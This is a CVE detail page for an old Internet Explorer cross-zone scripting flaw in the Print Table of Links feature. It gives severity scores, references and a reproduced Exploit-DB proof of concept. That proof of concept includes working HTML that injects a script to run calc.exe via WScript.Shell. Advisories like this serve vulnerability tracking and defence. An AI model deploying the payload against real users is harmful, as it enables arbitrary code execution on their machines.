CVE-2008-2281 : Detail

CVE-2008-2281

32.16%V3
Network
2008-05-18
12h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-zone scripting vulnerability in the Print Table of Links feature in Internet Explorer 6.0, 7.0, and 8.0b allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via an HTML document with a link containing JavaScript sequences, which are evaluated by a resource script when a user prints this document.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5619

Publication date : 2008-05-13 22h00 +00:00
Author : Aviv Raff
EDB Verified : Yes

<!-- Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability Author: Aviv Raff http://aviv.raffon.net/ Summary Internet Explorer is prone to a Cross-Zone Scripting vulnerability in its “Print Table of Links” feature. This feature allows users to add to a printed web page an appendix which contains a table of all the links in that webpage. An attacker can easily add a specially crafted link to a webpage (e.g. at his own website, comments in blogs, social networks, Wikipedia, etc.), so whenever a user will print this webpage with this feature enabled, the attacker will be able to run arbitrary code on the user’s machine (i.e. in order to take control over the machine). Affected version Internet Explorer 7.0 and 8.0b on a fully patched Windows XP. Windows Vista with UAC enabled is partially affected (Information Leakage only). Earlier versions of Internet Explorer may also be affected. Technical details Whenever a user prints a page, Internet Explorer uses a local resource script which generates an new HTML to be printed. This HTML consists of the following elements: Header, webpage body, Footer, and if enabled, also the table of links in the webpage. While the script takes only the text within the link’s inner data, it does not validate the URL of links, and add it to the HTML as it is. This allows to inject a script that will be executed when the new HTML will be generated. As I said in a previous post, most of the local resources in Internet Explorer are now running in Internet Zone. Unfortunately, the printing local resource script is running in Local Machine Zone, which means that any injected script can execute arbitrary code on the user’s machine. Proof of Concept The following is an example of a URL which executes Windows Calculator: http://www.google.com/?q=<script defer>new ActiveXObject(“Wscript.Shell”).run(“calc”)</script> --> <html> <body> Print me with table of links to execute calc.exe <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a> <script>window.print();</script> </body> </html> # milw0rm.com [2008-05-14]

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 8.0b

    Microsoft>>Internet_explorer >> Version 6.0

    Microsoft>>Internet_explorer >> Version 7.0

    References

    https://www.exploit-db.com/exploits/5619
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://secunia.com/advisories/30141
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/29217
    Tags : vdb-entry, x_refsource_BID